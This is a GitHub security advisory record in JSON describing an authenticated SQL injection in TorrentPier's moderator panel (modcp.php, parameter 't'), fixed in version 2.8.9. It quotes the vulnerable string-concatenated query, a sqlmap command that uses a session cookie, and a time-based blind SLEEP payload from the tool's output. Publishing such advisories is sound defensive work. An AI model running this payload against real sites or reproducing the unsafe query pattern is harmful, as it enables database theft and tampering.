{"id":"GHSA-4rwr-8c3m-55f6","summary":"TorrentPier is Vulnerable to Authenticated SQL Injection through Moderator Control Panel's topic_id parameter","details":"### Summary\nAn authenticated SQL injection vulnerability exists in the moderator control panel (`modcp.php`). Users with moderator permissions can exploit this vulnerability by supplying a malicious `topic_id` (`t`) parameter. This allows an authenticated moderator to execute arbitrary SQL queries, leading to the potential disclosure, modification, or deletion of any data in the database.\n\n### Details\nThe vulnerability is triggered when `modcp.php` processes a request that includes a `topic_id` (`t` parameter). The value of `$topic_id` is taken directly from user input and is not sanitized or parameterized before being concatenated into an SQL query.\n\nThis occurs within the initial data retrieval block for a given topic ID.\n\n**Vulnerable Code Block in `modcp.php` (lines 111-122):**\n```php\nif ($topic_id) {\n    $sql = \"\n\t\tSELECT\n\t\t\tf.forum_id, f.forum_name, f.forum_topics, f.self_moderated,\n\t\t\tt.topic_first_post_id, t.topic_poster\n\t\tFROM \" . BB_TOPICS . \" t, \" . BB_FORUMS . \" f\n\t\tWHERE t.topic_id = $topic_id\n\t\t\tAND f.forum_id = t.forum_id\n\t\tLIMIT 1\n\t\";\n\n    if (!$topic_row = DB()-\u003efetch_row($sql)) {\n        bb_die($lang['INVALID_TOPIC_ID_DB']);\n    }\n    // ...\n}\n```\nIn the `WHERE t.topic_id = $topic_id` clause, the `$topic_id` variable is directly embedded into the query string. An attacker can inject SQL syntax (e.g., boolean logic, time-based functions) into the `t` parameter to manipulate the query's execution.\n\n### PoC\nThis is a time-based blind SQL injection vulnerability that requires moderator privileges.\n\n**Prerequisites:**\n1.  A running instance of TorrentPier.\n2.  An account with moderator permissions.\n\n**Steps to Reproduce:**\n\n1.  Log in as a moderator.\n2.  Obtain your full session cookie string from your browser's developer tools.\n3.  Use `sqlmap` to automate the exploitation. The tool will test the `t` parameter for vulnerabilities.\n\n**`sqlmap` Command:**\n*(Note: Replace `https://localhost` with the target URL and `\"your_full_cookie_string\"` with the actual cookie data from your browser session, e.g., `\"key1=value1; key2=value2\"`)*.\n\n```bash\nsqlmap -u \"https://localhost/modcp.php?mode=lock&t=1\" -p t --cookie \"your_full_cookie_string\" --dbms mysql --technique T --current-db\n```\n\n**`sqlmap` Output Confirmation:**\nThe following output from `sqlmap` confirms successful exploitation:\n```\n---\nParameter: t (GET)\n    Type: time-based blind\n    Title: MySQL \u003e= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: mode=lock&t=1 AND (SELECT 9461 FROM (SELECT(SLEEP(5)))KxhM)\n---\n[INFO] the back-end DBMS is MySQL\n[INFO] fetching current database\n[INFO] retrieved: torrentpier\ncurrent database: 'torrentpier'\n```\n\n### Impact\nThis is an authenticated SQL Injection vulnerability. Although it requires moderator privileges, it is still severe. A malicious or compromised moderator account can leverage this vulnerability to:\n\n*   **Read sensitive data:** Extract any information from the database, including user credentials (password hashes), private messages, email addresses, and other private data.\n*   **Modify data:** Alter records in the database, such as elevating their own or other users' privileges to administrator level.\n*   **Delete data:** Corrupt or destroy forum data by dropping tables or deleting records.","aliases":["CVE-2025-64519"],"modified":"2026-05-13T13:52:30.544034Z","published":"2025-11-10T21:30:44Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2025-11-10T21:30:44Z","nvd_published_at":"2025-11-10T23:15:41Z","cwe_ids":["CWE-89"]},"references":[{"type":"WEB","url":"https://github.com/torrentpier/torrentpier/security/advisories/GHSA-4rwr-8c3m-55f6"},{"type":"WEB","url":"https://github.com/torrentpier/torrentpier/commit/6a0f6499d89fa5d6e2afa8ee53802a1ad11ece80"},{"type":"PACKAGE","url":"https://github.com/torrentpier/torrentpier"},{"type":"WEB","url":"https://github.com/torrentpier/torrentpier/releases/tag/v2.8.9"}],"affected":[{"package":{"name":"torrentpier/torrentpier","ecosystem":"Packagist","purl":"pkg:composer/torrentpier/torrentpier"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"2.8.9"}]}],"versions":["2.3.0.4-beta","2.3.0.4-beta2","v2.2.0","v2.2.1","v2.2.2","v2.2.3","v2.3.0","v2.3.0.1","v2.3.0.2","v2.3.0.3","v2.3.1","v2.3.1-rc1","v2.4.0","v2.4.0-alpha1","v2.4.0-alpha2","v2.4.0-alpha3","v2.4.0-alpha4","v2.4.0-beta1","v2.4.0-beta2","v2.4.0-beta3","v2.4.0-beta4","v2.4.0-rc1","v2.4.0-rc2","v2.4.1","v2.4.10","v2.4.11","v2.4.12","v2.4.13","v2.4.2","v2.4.3","v2.4.4","v2.4.5","v2.4.5-rc.1","v2.4.5-rc.2","v2.4.5-rc.3","v2.4.5-rc.4","v2.4.5-rc.5","v2.4.6","v2.4.6-alpha.1","v2.4.6-alpha.2","v2.4.6-alpha.3","v2.4.6-alpha.4","v2.4.7","v2.4.8","v2.4.9","v2.5.0","v2.6.0","v2.7.0","v2.8.0","v2.8.1","v2.8.2","v2.8.3","v2.8.4","v2.8.4.1","v2.8.5","v2.8.6","v2.8.7","v2.8.8"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/11/GHSA-4rwr-8c3m-55f6/GHSA-4rwr-8c3m-55f6.json","last_known_affected_version_range":"\u003c= 2.8.8"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}]}